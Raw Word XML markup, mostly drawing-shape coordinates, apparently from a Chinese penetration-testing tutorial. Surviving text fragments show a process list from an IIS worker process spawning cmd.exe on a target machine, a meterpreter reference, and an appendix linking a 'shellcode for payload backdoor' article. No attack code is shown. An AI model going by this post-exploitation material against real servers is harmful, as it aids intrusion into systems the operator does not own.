        <v:shape style="position:absolute;left:1490;top:3650;width:30;height:330" coordorigin="1490,3650" coordsize="30,330" path="m1517,3656l1517,3656,1517,3656,1517,3656,1517,3656,1517,3656,1517,3656,1517,3656,1517,3656,1517,3656,1517,3656,1517,3656,1517,3656,1517,3656,1517,3656,1517,3656,1517,3656,1517,3657,1517,3657,1517,3657,1517,3657,1517,3657,1517,3658,1517,3658,1517,3658,1517,3659,1517,3659,1517,3659,1517,3660,1517,3660,1517,3661,1517,3661,1517,3662,1517,3662,1517,3663,1517,3664,1517,3664,1517,3665,1517,3666,1517,3667,1517,3667,1517,3668,1517,3669,1517,3670,1517,3671,1517,3673,1517,3674,1517,3675,1517,3676,1517,3678,1517,3679,1517,3680,1517,3682,1517,3683,1517,3685,1517,3687,1517,3688,1517,3690,1517,3692,1517,3694,1517,3696,1517,3698,1517,3700,1517,3703,1517,3705,1517,3707,1517,3710,1517,3712,1517,3715,1517,3717,1517,3720,1517,3723,1517,3726,1517,3729,1517,3732,1517,3735,1517,3738,1517,3742,1517,3745,1517,3749,1517,3752,1517,3756,1517,3760,1517,3764,1517,3768,1517,3772,1517,3776,1517,3780,1517,3785,1517,3789,1517,3794,1517,3799,1517,3803,1517,3808,1517,3813,1517,3819,1517,3824,1517,3829,1517,3835,1517,3840,1517,3846,1517,3852,1517,3858,1517,3864,1517,3870,1517,3876,1517,3883,1517,3889,1517,3896,1517,3903,1517,3910,1517,3917,1517,3924,1517,3931,1517,3939,1517,3946,1517,3954,1517,3962,1517,3970,1517,3978,1517,3986e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:198.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3970" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:3970;width:8990;height:390" coordorigin="1490,3970" coordsize="8990,390" path="m1510,3986l1510,3986,1510,3986,1510,3986,1510,3986,1510,3986,1510,3986,1511,3986,1512,3986,1512,3986,1514,3986,1515,3986,1517,3986,1519,3986,1521,3986,1524,3986,1528,3986,1532,3986,1536,3986,1541,3986,1546,3986,1552,3986,1559,3986,1566,3986,1575,3986,1583,3986,1593,3986,1603,3986,1615,3986,1627,3986,1640,3986,1654,3986,1668,3986,1684,3986,1701,3986,1719,3986,1738,3986,1758,3986,1780,3986,1802,3986,1826,3986,1851,3986,1877,3986,1904,3986,1933,3986,1963,3986,1995,3986,2028,3986,2063,3986,2099,3986,2136,3986,2175,3986,2216,3986,2259,3986,2303,3986,2348,3986,2396,3986,2445,3986,2496,3986,2549,3986,2604,3986,2660,3986,2719,3986,2779,3986,2841,3986,2906,3986,2972,3986,3041,3986,3112,3986,3184,3986,3259,3986,3336,3986,3416,3986,3498,3986,3582,3986,3668,3986,3757,3986,3848,3986,3941,3986,4037,3986,4136,3986,4236,3986,4340,3986,4446,3986,4555,3986,4666,3986,4780,3986,4897,3986,5017,3986,5139,3986,5264,3986,5392,3986,5523,3986,5657,3986,5793,3986,5933,3986,6076,3986,6222,3986,6370,3986,6522,3986,6677,3986,6835,3986,6997,3986,7161,3986,7329,3986,7500,3986,7675,3986,7853,3986,8034,3986,8219,3986,8407,3986,8598,3986,8793,3986,8992,3986,9194,3986,9400,3986,9609,3986,9823,3986,10039,3986,10260,3986,10484,3986,10484,3986,10484,3986,10484,3986,10484,3986,10484,3986,10484,3986,10484,3986,10484,3986,10484,3986,10484,3986,10484,3986,10484,3986,10484,3986,10484,3986,10484,3987,10484,3987,10484,3987,10484,3987,10484,3987,10484,3988,10484,3988,10484,3988,10484,3988,10484,3989,10484,3989,10484,3989,10484,3990,10484,3990,10484,3991,10484,3991,10484,3992,10484,3993,10484,3993,10484,3994,10484,3995,10484,3996,10484,3996,10484,3997,10484,3998,10484,3999,10484,4000,10484,4001,10484,4002,10484,4004,10484,4005,10484,4006,10484,4008,10484,4009,10484,4011,10484,4012,10484,4014,10484,4016,10484,4017,10484,4019,10484,4021,10484,4023,10484,4025,10484,4027,10484,4029,10484,4032,10484,4034,10484,4037,10484,4039,10484,4042,10484,4044,10484,4047,10484,4050,10484,4053,10484,4056,10484,4059,10484,4062,10484,4066,10484,4069,10484,4073,10484,4076,10484,4080,10484,4084,10484,4088,10484,4092,10484,4096,10484,4100,10484,4104,10484,4109,10484,4113,10484,4118,10484,4123,10484,4128,10484,4133,10484,4138,10484,4143,10484,4148,10484,4154,10484,4159,10484,4165,10484,4171,10484,4177,10484,4183,10484,4189,10484,4196,10484,4202,10484,4209,10484,4215,10484,4222,10484,4229,10484,4236,10484,4244,10484,4251,10484,4259,10484,4266,10484,4274,10484,4282,10484,4290,10484,4299,10484,4307,10484,4316,10484,4325,10484,4334,10484,4343,10484,4352,10484,4361,10484,4361,10484,4361,10484,4361,10484,4361,10484,4361,10484,4361,10483,4361,10482,4361,10482,4361,10480,4361,10479,4361,10477,4361,10475,4361,10473,4361,10470,4361,10466,4361,10462,4361,10458,4361,10453,4361,10448,4361,10442,4361,10435,4361,10428,4361,10419,4361,10411,4361,10401,4361,10391,4361,10379,4361,10367,4361,10354,4361,10340,4361,10326,4361,10310,4361,10293,4361,10275,4361,10256,4361,10236,4361,10215,4361,10192,4361,10168,4361,10143,4361,10117,4361,10090,4361,10061,4361,10031,4361,9999,4361,9966,4361,9931,4361,9895,4361,9858,4361,9819,4361,9778,4361,9735,4361,9691,4361,9646,4361,9598,4361,9549,4361,9498,4361,9445,4361,9391,4361,9334,4361,9275,4361,9215,4361,9153,4361,9088,4361,9022,4361,8953,4361,8883,4361,8810,4361,8735,4361,8658,4361,8578,4361,8497,4361,8413,4361,8326,4361,8238,4361,8146,4361,8053,4361,7957,4361,7859,4361,7758,4361,7654,4361,7548,4361,7439,4361,7328,4361,7214,4361,7097,4361,6977,4361,6855,4361,6730,4361,6602,4361,6471,4361,6337,4361,6201,4361,6061,4361,5918,4361,5773,4361,5624,4361,5472,4361,5317,4361,5159,4361,4997,4361,4833,4361,4665,4361,4494,4361,4319,4361,4141,4361,3960,4361,3776,4361,3587,4361,3396,4361,3201,4361,3002,4361,2800,4361,2594,4361,2385,4361,2172,4361,1955,4361,1734,4361,1510,4361,1510,4361,1510,4361,1510,4361,1510,4361,1510,4361,1510,4361,1510,4361,1510,4361,1510,4361,1510,4361,1510,4361,1510,4361,1510,4361,1510,4361,1510,4361,1510,4360,1510,4360,1510,4360,1510,4360,1510,4360,1510,4359,1510,4359,1510,4359,1510,4358,1510,4358,1510,4358,1510,4357,1510,4357,1510,4356,1510,4356,1510,4355,1510,4355,1510,4354,1510,4353,1510,4352,1510,4352,1510,4351,1510,4350,1510,4349,1510,4348,1510,4347,1510,4346,1510,4345,1510,4343,1510,4342,1510,4341,1510,4340,1510,4338,1510,4337,1510,4335,1510,4333,1510,4332,1510,4330,1510,4328,1510,4326,1510,4324,1510,4322,1510,4320,1510,4318,1510,4315,1510,4313,1510,4311,1510,4308,1510,4306,1510,4303,1510,4300,1510,4297,1510,4294,1510,4291,1510,4288,1510,4285,1510,4282,1510,4278,1510,4275,1510,4271,1510,4267,1510,4263,1510,4260,1510,4256,1510,4251,1510,4247,1510,4243,1510,4238,1510,4234,1510,4229,1510,4224,1510,4220,1510,4215,1510,4209,1510,4204,1510,4199,1510,4193,1510,4188,1510,4182,1510,4176,1510,4170,1510,4164,1510,4158,1510,4152,1510,4145,1510,4139,1510,4132,1510,4125,1510,4118,1510,4111,1510,4103,1510,4096,1510,4088,1510,4081,1510,4073,1510,4065,1510,4057,1510,4048,1510,4040,1510,4031,1510,4023,1510,4014,1510,4005,1510,3995,1510,3986e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:198.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3970" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:3970;width:30;height:390" coordorigin="1490,3970" coordsize="30,390" path="m1517,3986l1517,3986,1517,3986,1517,3986,1517,3986,1517,3986,1517,3986,1517,3986,1517,3986,1517,3986,1517,3986,1517,3986,1517,3986,1517,3986,1517,3986,1517,3987,1517,3987,1517,3987,1517,3987,1517,3987,1517,3988,1517,3988,1517,3988,1517,3988,1517,3989,1517,3989,1517,3989,1517,3990,1517,3990,1517,3991,1517,3991,1517,3992,1517,3993,1517,3993,1517,3994,1517,3995,1517,3996,1517,3996,1517,3997,1517,3998,1517,3999,1517,4000,1517,4001,1517,4002,1517,4004,1517,4005,1517,4006,1517,4008,1517,4009,1517,4011,1517,4012,1517,4014,1517,4016,1517,4017,1517,4019,1517,4021,1517,4023,1517,4025,1517,4027,1517,4029,1517,4032,1517,4034,1517,4037,1517,4039,1517,4042,1517,4044,1517,4047,1517,4050,1517,4053,1517,4056,1517,4059,1517,4062,1517,4066,1517,4069,1517,4073,1517,4076,1517,4080,1517,4084,1517,4088,1517,4092,1517,4096,1517,4100,1517,4104,1517,4109,1517,4113,1517,4118,1517,4123,1517,4128,1517,4133,1517,4138,1517,4143,1517,4148,1517,4154,1517,4159,1517,4165,1517,4171,1517,4177,1517,4183,1517,4189,1517,4196,1517,4202,1517,4209,1517,4215,1517,4222,1517,4229,1517,4236,1517,4244,1517,4251,1517,4259,1517,4266,1517,4274,1517,4282,1517,4290,1517,4299,1517,4307,1517,4316,1517,4325,1517,4334,1517,4343,1517,4352,1517,4361e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:217.500pt;width:449.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,4350" coordsize="8990,350">
        <v:shape style="position:absolute;left:1490;top:4350;width:8990;height:350" coordorigin="1490,4350" coordsize="8990,350" path="m1510,4361l1510,4361,1510,4361,1510,4361,1510,4361,1510,4361,1510,4361,1511,4361,1512,4361,1512,4361,1514,4361,1515,4361,1517,4361,1519,4361,1521,4361,1524,4361,1528,4361,1532,4361,1536,4361,1541,4361,1546,4361,1552,4361,1559,4361,1566,4361,1575,4361,1583,4361,1593,4361,1603,4361,1615,4361,1627,4361,1640,4361,1654,4361,1668,4361,1684,4361,1701,4361,1719,4361,1738,4361,1758,4361,1780,4361,1802,4361,1826,4361,1851,4361,1877,4361,1904,4361,1933,4361,1963,4361,1995,4361,2028,4361,2063,4361,2099,4361,2136,4361,2175,4361,2216,4361,2259,4361,2303,4361,2348,4361,2396,4361,2445,4361,2496,4361,2549,4361,2604,4361,2660,4361,2719,4361,2779,4361,2841,4361,2906,4361,2972,4361,3041,4361,3112,4361,3184,4361,3259,4361,3336,4361,3416,4361,3498,4361,3582,4361,3668,4361,3757,4361,3848,4361,3941,4361,4037,4361,4136,4361,4236,4361,4340,4361,4446,4361,4555,4361,4666,4361,4780,4361,4897,4361,5017,4361,5139,4361,5264,4361,5392,4361,5523,4361,5657,4361,5793,4361,5933,4361,6076,4361,6222,4361,6370,4361,6522,4361,6677,4361,6835,4361,6997,4361,7161,4361,7329,4361,7500,4361,7675,4361,7853,4361,8034,4361,8219,4361,8407,4361,8598,4361,8793,4361,8992,4361,9194,4361,9400,4361,9609,4361,9823,4361,10039,4361,10260,4361,10484,4361,10484,4361,10484,4361,10484,4361,10484,4361,10484,4361,10484,4361,10484,4361,10484,4361,10484,4361,10484,4361,10484,4361,10484,4361,10484,4362,10484,4362,10484,4362,10484,4362,10484,4362,10484,4362,10484,4362,10484,4363,10484,4363,10484,4363,10484,4363,10484,4364,10484,4364,10484,4364,10484,4365,10484,4365,10484,4366,10484,4366,10484,4367,10484,4367,10484,4368,10484,4369,10484,4369,10484,4370,10484,4371,10484,4372,10484,4372,10484,4373,10484,4374,10484,4375,10484,4376,10484,4377,10484,4379,10484,4380,10484,4381,10484,4382,10484,4384,10484,4385,10484,4387,10484,4388,10484,4390,10484,4392,10484,4393,10484,4395,10484,4397,10484,4399,10484,4401,10484,4403,10484,4405,10484,4408,10484,4410,10484,4412,10484,4415,10484,4417,10484,4420,10484,4423,10484,4426,10484,4428,10484,4431,10484,4435,10484,4438,10484,4441,10484,4444,10484,4448,10484,4451,10484,4455,10484,4458,10484,4462,10484,4466,10484,4470,10484,4474,10484,4478,10484,4483,10484,4487,10484,4491,10484,4496,10484,4501,10484,4506,10484,4511,10484,4516,10484,4521,10484,4526,10484,4531,10484,4537,10484,4542,10484,4548,10484,4554,10484,4560,10484,4566,10484,4572,10484,4579,10484,4585,10484,4592,10484,4598,10484,4605,10484,4612,10484,4619,10484,4626,10484,4634,10484,4641,10484,4649,10484,4657,10484,4665,10484,4673,10484,4681,10484,4689,10484,4698,10484,4706,10484,4706,10484,4706,10484,4706,10484,4706,10484,4706,10484,4706,10483,4706,10482,4706,10482,4706,10480,4706,10479,4706,10477,4706,10475,4706,10473,4706,10470,4706,10466,4706,10462,4706,10458,4706,10453,4706,10448,4706,10442,4706,10435,4706,10428,4706,10419,4706,10411,4706,10401,4706,10391,4706,10379,4706,10367,4706,10354,4706,10340,4706,10326,4706,10310,4706,10293,4706,10275,4706,10256,4706,10236,4706,10215,4706,10192,4706,10168,4706,10143,4706,10117,4706,10090,4706,10061,4706,10031,4706,9999,4706,9966,4706,9931,4706,9895,4706,9858,4706,9819,4706,9778,4706,9735,4706,9691,4706,9646,4706,9598,4706,9549,4706,9498,4706,9445,4706,9391,4706,9334,4706,9275,4706,9215,4706,9153,4706,9088,4706,9022,4706,8953,4706,8883,4706,8810,4706,8735,4706,8658,4706,8578,4706,8497,4706,8413,4706,8326,4706,8238,4706,8146,4706,8053,4706,7957,4706,7859,4706,7758,4706,7654,4706,7548,4706,7439,4706,7328,4706,7214,4706,7097,4706,6977,4706,6855,4706,6730,4706,6602,4706,6471,4706,6337,4706,6201,4706,6061,4706,5918,4706,5773,4706,5624,4706,5472,4706,5317,4706,5159,4706,4997,4706,4833,4706,4665,4706,4494,4706,4319,4706,4141,4706,3960,4706,3776,4706,3587,4706,3396,4706,3201,4706,3002,4706,2800,4706,2594,4706,2385,4706,2172,4706,1955,4706,1734,4706,1510,4706,1510,4706,1510,4706,1510,4706,1510,4706,1510,4706,1510,4706,1510,4706,1510,4706,1510,4706,1510,4706,1510,4706,1510,4706,1510,4706,1510,4706,1510,4706,1510,4706,1510,4706,1510,4705,1510,4705,1510,4705,1510,4705,1510,4704,1510,4704,1510,4704,1510,4704,1510,4703,1510,4703,1510,4702,1510,4702,1510,4701,1510,4701,1510,4700,1510,4700,1510,4699,1510,4698,1510,4698,1510,4697,1510,4696,1510,4695,1510,4694,1510,4693,1510,4692,1510,4691,1510,4690,1510,4689,1510,4688,1510,4686,1510,4685,1510,4684,1510,4682,1510,4681,1510,4679,1510,4678,1510,4676,1510,4674,1510,4672,1510,4670,1510,4668,1510,4666,1510,4664,1510,4662,1510,4660,1510,4658,1510,4655,1510,4653,1510,4650,1510,4647,1510,4645,1510,4642,1510,4639,1510,4636,1510,4633,1510,4630,1510,4627,1510,4623,1510,4620,1510,4616,1510,4613,1510,4609,1510,4605,1510,4601,1510,4598,1510,4593,1510,4589,1510,4585,1510,4581,1510,4576,1510,4571,1510,4567,1510,4562,1510,4557,1510,4552,1510,4547,1510,4542,1510,4536,1510,4531,1510,4525,1510,4519,1510,4514,1510,4508,1510,4502,1510,4495,1510,4489,1510,4483,1510,4476,1510,4469,1510,4462,1510,4455,1510,4448,1510,4441,1510,4434,1510,4426,1510,4419,1510,4411,1510,4403,1510,4395,1510,4387,1510,4378,1510,4370,1510,4361e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:216.600pt;width:445.800pt;height:18.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId28" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:174.500pt;margin-top:200.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3490,4010" coordsize="130,270">
        <v:shape style="position:absolute;left:3490;top:4010;width:130;height:270" coordorigin="3490,4010" coordsize="130,270" path="m3506,4031l3506,4031,3506,4031,3506,4031,3506,4031,3506,4031,3506,4031,3506,4031,3506,4031,3506,4031,3506,4031,3506,4031,3506,4031,3506,4031,3506,4031,3506,4031,3506,4031,3506,4031,3506,4031,3506,4031,3506,4031,3506,4031,3506,4031,3507,4031,3507,4031,3507,4031,3507,4031,3507,4031,3507,4031,3507,4031,3508,4031,3508,4031,3508,4031,3508,4031,3508,4031,3509,4031,3509,4031,3509,4031,3509,4031,3510,4031,3510,4031,3510,4031,3511,4031,3511,4031,3511,4031,3512,4031,3512,4031,3513,4031,3513,4031,3514,4031,3514,4031,3515,4031,3515,4031,3516,4031,3516,4031,3517,4031,3518,4031,3518,4031,3519,4031,3520,4031,3520,4031,3521,4031,3522,4031,3523,4031,3524,4031,3524,4031,3525,4031,3526,4031,3527,4031,3528,4031,3529,4031,3530,4031,3531,4031,3532,4031,3533,4031,3535,4031,3536,4031,3537,4031,3538,4031,3540,4031,3541,4031,3542,4031,3544,4031,3545,4031,3547,4031,3548,4031,3550,4031,3551,4031,3553,4031,3554,4031,3556,4031,3558,4031,3559,4031,3561,4031,3563,4031,3565,4031,3567,4031,3569,4031,3571,4031,3573,4031,3575,4031,3577,4031,3579,4031,3581,4031,3584,4031,3586,4031,3588,4031,3591,4031,3593,4031,3596,4031,3598,4031,3601,4031,3603,4031,3606,4031,3609,4031,3611,4031,3614,4031,3617,4031,3620,4031,3623,4031,3626,4031,3626,4031,3626,4031,3626,4031,3626,4031,3626,4031,3626,4031,3626,4031,3626,4031,3626,4031,3626,4031,3626,4031,3626,4031,3626,4031,3626,4031,3626,4031,3626,4032,3626,4032,3626,4032,3626,4032,3626,4032,3626,4032,3626,4032,3626,4033,3626,4033,3626,4033,3626,4033,3626,4034,3626,4034,3626,4034,3626,4035,3626,4035,3626,4036,3626,4036,3626,4036,3626,4037,3626,4038,3626,4038,3626,4039,3626,4039,3626,4040,3626,4041,3626,4041,3626,4042,3626,4043,3626,4044,3626,4045,3626,4046,3626,4047,3626,4048,3626,4049,3626,4050,3626,4051,3626,4052,3626,4054,3626,4055,3626,4056,3626,4058,3626,4059,3626,4061,3626,4062,3626,4064,3626,4065,3626,4067,3626,4069,3626,4071,3626,4073,3626,4075,3626,4077,3626,4079,3626,4081,3626,4083,3626,4085,3626,4088,3626,4090,3626,4092,3626,4095,3626,4097,3626,4100,3626,4103,3626,4106,3626,4109,3626,4111,3626,4115,3626,4118,3626,4121,3626,4124,3626,4127,3626,4131,3626,4134,3626,4138,3626,4141,3626,4145,3626,4149,3626,4153,3626,4157,3626,4161,3626,4165,3626,4169,3626,4174,3626,4178,3626,4182,3626,4187,3626,4192,3626,4196,3626,4201,3626,4206,3626,4211,3626,4216,3626,4222,3626,4227,3626,4233,3626,4238,3626,4244,3626,4249,3626,4255,3626,4261,3626,4267,3626,4274,3626,4280,3626,4286,3626,4286,3626,4286,3626,4286,3626,4286,3626,4286,3626,4286,3626,4286,3626,4286,3626,4286,3626,4286,3626,4286,3626,4286,3626,4286,3626,4286,3626,4286,3626,4286,3626,4286,3625,4286,3625,4286,3625,4286,3625,4286,3625,4286,3625,4286,3625,4286,3625,4286,3625,4286,3625,4286,3624,4286,3624,4286,3624,4286,3624,4286,3624,4286,3623,4286,3623,4286,3623,4286,3623,4286,3623,4286,3622,4286,3622,4286,3622,4286,3621,4286,3621,4286,3621,4286,3620,4286,3620,4286,3619,4286,3619,4286,3618,4286,3618,4286,3617,4286,3617,4286,3616,4286,3616,4286,3615,4286,3615,4286,3614,4286,3613,4286,3613,4286,3612,4286,3611,4286,3610,4286,3610,4286,3609,4286,3608,4286,3607,4286,3606,4286,3605,4286,3604,4286,3603,4286,3602,4286,3601,4286,3600,4286,3599,4286,3598,4286,3597,4286,3596,4286,3595,4286,3593,4286,3592,4286,3591,4286,3589,4286,3588,4286,3587,4286,3585,4286,3584,4286,3582,4286,3581,4286,3579,4286,3577,4286,3576,4286,3574,4286,3572,4286,3570,4286,3569,4286,3567,4286,3565,4286,3563,4286,3561,4286,3559,4286,3557,4286,3555,4286,3552,4286,3550,4286,3548,4286,3546,4286,3543,4286,3541,4286,3539,4286,3536,4286,3534,4286,3531,4286,3528,4286,3526,4286,3523,4286,3520,4286,3517,4286,3515,4286,3512,4286,3509,4286,3506,4286,3506,4286,3506,4286,3506,4286,3506,4286,3506,4286,3506,4286,3506,4286,3506,4286,3506,4286,3506,4286,3506,4286,3506,4286,3506,4286,3506,4286,3506,4286,3506,4286,3506,4286,3506,4285,3506,4285,3506,4285,3506,4285,3506,4285,3506,4285,3506,4284,3506,4284,3506,4284,3506,4283,3506,4283,3506,4283,3506,4282,3506,4282,3506,4282,3506,4281,3506,4281,3506,4280,3506,4280,3506,4279,3506,4278,3506,4278,3506,4277,3506,4276,3506,4276,3506,4275,3506,4274,3506,4273,3506,4272,3506,4271,3506,4270,3506,4269,3506,4268,3506,4267,3506,4266,3506,4265,3506,4264,3506,4262,3506,4261,3506,4260,3506,4258,3506,4257,3506,4255,3506,4253,3506,4252,3506,4250,3506,4248,3506,4246,3506,4245,3506,4243,3506,4241,3506,4239,3506,4236,3506,4234,3506,4232,3506,4230,3506,4227,3506,4225,3506,4222,3506,4220,3506,4217,3506,4214,3506,4212,3506,4209,3506,4206,3506,4203,3506,4200,3506,4196,3506,4193,3506,4190,3506,4186,3506,4183,3506,4179,3506,4176,3506,4172,3506,4168,3506,4164,3506,4160,3506,4156,3506,4152,3506,4148,3506,4144,3506,4139,3506,4135,3506,4130,3506,4125,3506,4121,3506,4116,3506,4111,3506,4106,3506,4101,3506,4095,3506,4090,3506,4085,3506,4079,3506,4073,3506,4068,3506,4062,3506,4056,3506,4050,3506,4044,3506,4037,3506,4031e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:255.600pt;width:467.400pt;height:474.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId29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52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3196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468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svchost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36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53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3300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1368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w3wp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IIS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APPPOOL\DefaultAppPool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19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\windows\system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32\inetsrv\w3wp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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="148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54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3408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3300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cmd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IIS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APPPOOL\DefaultAppPool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19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\Windows\system3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2\cmd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exe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55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980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3712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2896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notepad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exe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56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4092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324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conhost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x64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0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IIS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APPPOOL\DefaultAppPool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19"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C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\Windows\syst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em32\conhost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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="137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57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8182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58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meterpreter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19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59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8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靶机：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551.400pt;width:7.200pt;height:7.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId30" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:69.599pt;width:467.400pt;height:244.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId3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附录：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Micropoor_shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="3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for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="3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payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="3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backdoor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3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://micropoor.blogspot.com/2019/01/mic</w:t>
      </w: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ropoorshellcode-for-payload-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9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>backd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>oor.html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2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	<Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/31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